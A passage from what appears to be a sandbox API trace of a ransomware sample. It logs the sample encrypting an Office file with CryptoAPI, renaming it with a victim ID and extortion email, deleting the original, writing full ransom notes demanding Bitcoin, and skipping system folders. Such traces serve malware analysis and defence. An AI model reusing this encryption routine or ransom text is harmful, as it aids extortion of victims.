x.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".dat") returned=".dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0159.663] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0159.663] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0159.664] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\stream.x86.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\stream.x86.x-none.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0159.860] ReadFile (in: hFile=0x39c, lpBuffer=0x290a020, nNumberOfBytesToRead=0x38b5ce, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0x290a020*, lpNumberOfBytesRead=0x189930*=0x38b5ce, lpOverlapped=0x0) returned 1
	[0161.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0161.044] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcabc0) returned 1
	[0161.047] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0161.047] CryptCreateHash (in: hProv=0xfcabc0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0161.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0161.048] CryptHashData (hHash=0xfb8ef0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0161.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0161.048] CryptDeriveKey (in: hProv=0xfcabc0, Algid=0x6610, hBaseData=0xfb8ef0, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb9530) returned 1
	[0161.048] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0161.049] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x38b5ce, dwBufLen=0x38b5ce | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x38b5d0) returned 1
	[0161.160] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0161.160] RtlMoveMemory (in: Destination=0x2cae020, Source=0x290a020, Length=0x38b5ce | out: Destination=0x2cae020) 
	[0161.592] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0161.593] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2cae020*, pdwDataLen=0x1894dc*=0x38b5ce, dwBufLen=0x38b5d0 | out: pbData=0x2cae020*, pdwDataLen=0x1894dc*=0x38b5d0) returned 1
	[0161.771] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0161.771] CryptDestroyKey (hKey=0xfb9530) returned 1
	[0161.771] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0161.771] CryptDestroyHash (hHash=0xfb8ef0) returned 1
	[0161.772] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0161.772] CryptReleaseContext (hProv=0xfcabc0, dwFlags=0x0) returned 1
	[0161.772] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0161.772] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0161.773] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0161.774] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0161.776] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\stream.x86.x-none.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 154
	[0161.776] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\stream.x86.x-none.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\stream.x86.x-none.man.dat.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0161.778] WriteFile (in: hFile=0x3a0, lpBuffer=0x2cae020*, nNumberOfBytesToWrite=0x38b5d0, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x2cae020*, lpNumberOfBytesWritten=0x189938*=0x38b5d0, lpOverlapped=0x0) returned 1
	[0162.399] CloseHandle (hObject=0x3a0) returned 1
	[0162.960] CloseHandle (hObject=0x39c) returned 1
	[0162.960] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\stream.x86.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\stream.x86.x-none.man.dat")) returned 1
	[0163.090] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\stream.x86.x-none.man.dat" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\stream.x86.x-none.man.dat")) returned 0
	[0163.090] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b61bc49, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1b61bc49, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x32e90800, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x38b5ce, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="stream.x86.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0
	[0163.090] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0163.091] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0163.091] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16"
	[0163.092] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\*.*"
	[0163.092] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0163.092] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0163.092] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\HELP_DECRYPT_YOUR_FILES.TXT") returned 114
	[0163.092] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0163.093] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0163.093] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0163.097] CloseHandle (hObject=0x390) returned 1
	[0163.097] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0163.098] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.098] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0163.099] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0163.099] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0163.100] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0163.100] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0163.100] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0163.100] CloseHandle (hObject=0x390) returned 1
	[0163.101] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0163.101] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0163.102] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0163.102] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\HELP_DECRYPT_YOUR_FILES.HTML") returned 115
	[0163.102] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0163.102] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0163.102] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0163.106] CloseHandle (hObject=0x390) returned 1
	[0163.107] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0163.107] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0163.108] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0163.108] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0163.111] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0163.111] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0163.111] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0163.111] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0163.112] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0163.112] CloseHandle (hObject=0x390) returned 1
	[0163.112] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b5f5640, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x7aa9178c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7abdf359, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0163.113] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\*.*") returned 90
	[0163.113] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0163.113] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\4BAD322A-C043-4DED-A97A-6FE0C4412FBE\\x-none.16\\*.*", cchLength=0x5a | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*") returned 0x5a
	[0163.113] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.114] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="windows") returned 0x0
	[0163.114] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.114] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="boot") returned 0x0
	[0163.114] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.114] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="system volume information") returned 0x0
	[0163.114] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.114] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0163.115] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.115] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="temp") returned 0x0
	[0163.115] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.115] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="program files") returned 0x0
	[0163.115] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.115] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="program files (x86)") returned 0x0
	[0163.115] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.116] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="appdata") returned 0x0
	[0163.116] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.116] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="application data") returned 0x0
	[0163.116] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.116] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="winnt") returned 0x0
	[0163.116] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.117] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="tmp") returned 0x0
	[0163.117] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.117] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="cache") returned 0x0
	[0163.117] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.117] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="temporary internet files") returned 0x0
	[0163.117] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.118] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="webcache") returned 0x0
	[0163.118] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.118] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="inetcache") returned 0x0
	[0163.167] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.168] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="nvidia") returned 0x0
	[0163.168] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.168] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="packages") returned 0x0
	[0163.168] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.168] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="cookies") returned 0x0
	[0163.168] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0163.169] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\4bad322a-c043-4ded-a97a-6fe0c4412fbe\\x-none.16\\*.*", lpSrch="programdata") returned 0x0
	[0163.169] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0163.169] lstrcmpW (lpString1=".", lpString2=".") returned 0
